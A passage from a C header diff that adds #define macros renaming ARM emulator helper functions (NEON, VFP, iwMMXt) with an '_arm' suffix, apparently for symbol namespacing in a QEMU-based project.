gen_helper_neon_narrow_sat_s16_arm +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_arm +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_arm +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_arm +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_arm +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_arm +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_arm +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_arm +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_arm +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_arm +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_arm +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_arm +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_arm +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_arm +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_arm +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_arm +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_arm +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_arm +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_arm +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_arm +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_arm +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_arm +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_arm +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_arm +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_arm +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_arm +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_arm +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_arm +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_arm +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_arm +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_arm +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_arm +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_arm +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_arm +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_arm +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_arm +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_arm +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_arm +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_arm +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_arm +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_arm +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_arm +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_arm +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_arm +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_arm +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_arm +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_arm +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_arm +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_arm +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_arm +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_arm +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_arm +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_arm +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_arm +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_arm +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_arm +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_arm +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_arm +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_arm +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_arm +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_arm +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_arm +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_arm +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_arm +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_arm +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_arm +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_arm +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_arm +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_arm +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_arm +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_arm +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_arm +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_arm +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_arm +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_arm +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_arm +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_arm +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_arm +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_arm +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_arm +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_arm +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_arm +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_arm +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_arm +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_arm +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_arm +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_arm +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_arm +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_arm +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_arm +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_arm +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_arm +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_arm +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_arm +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_arm +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_arm +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_arm +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_arm +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_arm +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_arm +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_arm +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_arm +#define gen_helper_neon_tbl gen_helper_neon_tbl_arm +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_arm +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_arm +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_arm +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_arm +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_arm +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_arm +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_arm +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_arm +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_arm +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_arm +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_arm +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_arm +#define gen_helper_neon_zip16 gen_helper_neon_zip16_arm +#define gen_helper_neon_zip8 gen_helper_neon_zip8_arm +#define gen_helper_pre_hvc gen_helper_pre_hvc_arm +#define gen_helper_pre_smc gen_helper_pre_smc_arm +#define gen_helper_qadd16 gen_helper_qadd16_arm +#define gen_helper_qadd8 gen_helper_qadd8_arm +#define gen_helper_qaddsubx gen_helper_qaddsubx_arm +#define gen_helper_qsub16 gen_helper_qsub16_arm +#define gen_helper_qsub8 gen_helper_qsub8_arm +#define gen_helper_qsubaddx gen_helper_qsubaddx_arm +#define gen_helper_rbit gen_helper_rbit_arm +#define gen_helper_recpe_f32 gen_helper_recpe_f32_arm +#define gen_helper_recpe_u32 gen_helper_recpe_u32_arm +#define gen_helper_recps_f32 gen_helper_recps_f32_arm +#define gen_helper_rintd gen_helper_rintd_arm +#define gen_helper_rintd_exact gen_helper_rintd_exact_arm +#define gen_helper_rints gen_helper_rints_arm +#define gen_helper_rints_exact gen_helper_rints_exact_arm +#define gen_helper_ror_cc gen_helper_ror_cc_arm +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_arm +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_arm +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_arm +#define gen_helper_sadd16 gen_helper_sadd16_arm +#define gen_helper_sadd8 gen_helper_sadd8_arm +#define gen_helper_saddsubx gen_helper_saddsubx_arm +#define gen_helper_sar_cc gen_helper_sar_cc_arm +#define gen_helper_sdiv gen_helper_sdiv_arm +#define gen_helper_sel_flags gen_helper_sel_flags_arm +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_arm +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_arm +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_arm +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_arm +#define gen_helper_set_rmode gen_helper_set_rmode_arm +#define gen_helper_set_user_reg gen_helper_set_user_reg_arm +#define gen_helper_shadd16 gen_helper_shadd16_arm +#define gen_helper_shadd8 gen_helper_shadd8_arm +#define gen_helper_shaddsubx gen_helper_shaddsubx_arm +#define gen_helper_shl_cc gen_helper_shl_cc_arm +#define gen_helper_shr_cc gen_helper_shr_cc_arm +#define gen_helper_shsub16 gen_helper_shsub16_arm +#define gen_helper_shsub8 gen_helper_shsub8_arm +#define gen_helper_shsubaddx gen_helper_shsubaddx_arm +#define gen_helper_ssat gen_helper_ssat_arm +#define gen_helper_ssat16 gen_helper_ssat16_arm +#define gen_helper_ssub16 gen_helper_ssub16_arm +#define gen_helper_ssub8 gen_helper_ssub8_arm +#define gen_helper_ssubaddx gen_helper_ssubaddx_arm +#define gen_helper_sub_saturate gen_helper_sub_saturate_arm +#define gen_helper_sxtb16 gen_helper_sxtb16_arm +#define gen_helper_uadd16 gen_helper_uadd16_arm +#define gen_helper_uadd8 gen_helper_uadd8_arm +#define gen_helper_uaddsubx gen_helper_uaddsubx_arm +#define gen_helper_udiv gen_helper_udiv_arm +#define gen_helper_uhadd16 gen_helper_uhadd16_arm +#define gen_helper_uhadd8 gen_helper_uhadd8_arm +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_arm +#define gen_helper_uhsub16 gen_helper_uhsub16_arm +#define gen_helper_uhsub8 gen_helper_uhsub8_arm +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_arm +#define gen_helper_uqadd16 gen_helper_uqadd16_arm +#define gen_helper_uqadd8 gen_helper_uqadd8_arm +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_arm +#define gen_helper_uqsub16 gen_helper_uqsub16_arm +#define gen_helper_uqsub8 gen_helper_uqsub8_arm +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_arm +#define gen_helper_usad8 gen_helper_usad8_arm +#define gen_helper_usat gen_helper_usat_arm +#define gen_helper_usat16 gen_helper_usat16_arm +#define gen_helper_usub16 gen_helper_usub16_arm +#define gen_helper_usub8 gen_helper_usub8_arm +#define gen_helper_usubaddx gen_helper_usubaddx_arm +#define gen_helper_uxtb16 gen_helper_uxtb16_arm +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_arm +#define gen_helper_v7m_msr gen_helper_v7m_msr_arm +#define gen_helper_vfp_absd gen_helper_vfp_absd_arm +#define gen_helper_vfp_abss gen_helper_vfp_abss_arm +#define gen_helper_vfp_addd gen_helper_vfp_addd_arm +#define gen_helper_vfp_adds gen_helper_vfp_adds_arm +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_arm +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_arm +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_arm +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_arm +#define gen_helper_vfp_divd gen_helper_vfp_divd_arm +#define gen_helper_vfp_divs gen_helper_vfp_divs_arm +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_arm +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_arm +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_arm +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_arm +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_arm +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_arm +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_arm +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_arm +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_arm +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_arm +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_arm +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_arm +#define gen_helper_vfp_mins gen_helper_vfp_mins_arm +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_arm +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_arm +#define gen_helper_vfp_muld gen_helper_vfp_muld_arm +#define gen_helper_vfp_muls gen_helper_vfp_muls_arm +#define gen_helper_vfp_negd gen_helper_vfp_negd_arm +#define gen_helper_vfp_negs gen_helper_vfp_negs_arm +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_arm +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_arm +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_arm +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_arm +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_arm +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_arm +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_arm +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_arm +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_arm +#define gen_helper_vfp_subd gen_helper_vfp_subd_arm +#define gen_helper_vfp_subs gen_helper_vfp_subs_arm +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_arm +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_arm +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_arm +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_arm +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_arm +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_arm +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_arm +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_arm +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_arm +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_arm +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_arm +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_arm +#define gen_helper_vfp_touid gen_helper_vfp_touid_arm +#define gen_helper_vfp_touis gen_helper_vfp_touis_arm +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_arm +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_arm +#define gen_helper_vfp_tould gen_helper_vfp_tould_arm +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_arm +#define gen_helper_vfp_touls gen_helper_vfp_touls_arm +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_arm +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_arm +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_arm +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_arm +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_arm +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_arm +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_arm +#define gen_helper_wfe gen_helper_wfe_arm +#define gen_helper_wfi gen_helper_wfi_arm +#define gen_hvc gen_hvc_arm +#define gen_intermediate_code_internal gen_intermediate_code_internal_arm +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_arm +#define gen_iwmmxt_address gen_iwmmxt_address_arm +#define gen_iwmmxt_shift gen_iwmmxt_shift_arm +#define gen_jmp gen_jmp_arm +#define gen_load_and_replicate gen_load_and_replicate_arm +#define gen_load_exclusive gen_load_exclusive_arm +#define gen_logic_CC gen_logic_CC_arm +#define gen_logicq_cc gen_logicq_cc_arm +#define gen_lookup_tb gen_lookup_tb_arm +#define gen_mov_F0_vreg gen_mov_F0_vreg_arm +#define gen_mov_F1_vreg gen_mov_F1_vreg_arm +#define gen_mov_vreg_F0 gen_mov_vreg_F0_arm +#define gen_muls_i64_i32 gen_muls_i64_i32_arm +#define gen_mulu_i64_i32 gen_mulu_i64_i32_arm +#define gen_mulxy gen_mulxy_arm +#define gen_neon_add gen_neon_add_arm +#define gen_neon_addl gen_neon_addl_arm +#define gen_neon_addl_saturate gen_neon_addl_saturate_arm +#define gen_neon_bsl gen_neon_bsl_arm +#define gen_neon_dup_high16 gen_neon_dup_high16_arm +#define gen_neon_dup_low16 gen_neon_dup_low16_arm +#define gen_neon_dup_u8 gen_neon_dup_u8_arm +#define gen_neon_mull gen_neon_mull_arm +#define gen_neon_narrow gen_neon_narrow_arm +#define gen_neon_narrow_op gen_neon_narrow_op_arm +#define gen_neon_narrow_sats gen_neon_narrow_sats_arm +#define gen_neon_narrow_satu gen_neon_narrow_satu_arm +#define gen_neon_negl gen_neon_negl_arm +#define gen_neon_rsb gen_neon_rsb_arm +#define gen_neon_shift_narrow gen_neon_shift_narrow_arm +#define gen_neon_subl gen_neon_subl_arm +#define gen_neon_trn_u16 gen_neon_trn_u16_arm +#define gen_neon_trn_u8 gen_neon_trn_u8_arm +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_arm +#define gen_neon_unzip gen_neon_unzip_arm +#define gen_neon_widen gen_neon_widen_arm +#define gen_neon_zip gen_neon_zip_arm +#define gen_new_label gen_new_label_arm +#define gen_nop_hint gen_nop_hint_arm +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_arm +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_arm +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_arm +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_arm +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_arm +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_arm +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_arm +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_arm +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_arm +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_arm +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_arm +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_arm +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_arm +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_arm +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_arm +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_arm +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_arm +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_arm +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_arm +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_arm +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_arm +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_arm +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_arm +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_arm +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_arm +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_arm +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_arm +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_arm +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_arm +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_arm +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_arm +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_arm +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_arm +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_arm +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_arm +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_arm +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_arm +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_arm +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_arm +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_arm +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_arm +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_arm +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_arm +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_arm +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_arm +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_arm +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_arm +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_arm +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_arm +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_arm +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_arm +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_arm +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_arm +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_arm +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_arm +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_arm +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_arm +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_arm +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_arm +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_arm +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_arm +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_arm +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_arm +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_arm +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_arm +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_arm +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_arm +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_arm +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_arm +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_arm +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_arm +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_arm +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_arm +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_arm +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_arm +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_arm +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_arm +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_arm +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_arm +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_arm +#define gen_rev16 gen_rev16_arm +#define gen_revsh gen_revsh_arm +#define gen_rfe gen_rfe_arm +#define gen_sar gen_sar_arm +#define gen_sbc_CC gen_sbc_CC_arm +#define gen_sbfx gen_sbfx_arm +#define gen_set_CF_bit31 gen_set_CF_bit31_arm +#define gen_set_condexec gen_set_condexec_arm +#define gen_set_cpsr gen_set_cpsr_arm +#define gen_set_label gen_set_label_arm +#define gen_set_pc_im gen_set_pc_im_arm +#define gen_set_psr gen_set_psr_arm +#define gen_set_psr_im gen_set_psr_im_arm +#define gen_shl gen_shl_arm +#define gen_shr gen_shr_arm +#define gen_smc gen_smc_arm +#define gen_smul_dual gen_smul_dual_arm +#define gen_srs gen_srs_arm +#define gen_ss_advance gen_ss_advance_arm +#define gen_step_complete_exception gen_step_complete_exception_arm +#define gen_store_exclusive gen_store_exclusive_arm +#define gen_storeq_reg gen_storeq_reg_arm +#define gen_sub_carry gen_sub_carry_arm +#define gen_sub_CC gen_sub_CC_arm +#define gen_subq_msw gen_subq_msw_arm +#define gen_swap_half gen_swap_half_arm +#define gen_thumb2_data_op gen_thumb2_data_op_arm +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_arm +#define gen_ubfx gen_ubfx_arm +#define gen_vfp_abs gen_vfp_abs_arm +#define gen_vfp_add gen_vfp_add_arm +#define gen_vfp_cmp gen_vfp_cmp_arm +#define gen_vfp_cmpe gen_vfp_cmpe_arm +#define gen_vfp_div gen_vfp_div_arm +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_arm +#define gen_vfp_F1_mul gen_vfp_F1_mul_arm +#define gen_vfp_F1_neg gen_vfp_F1_neg_arm +#define gen_vfp_ld 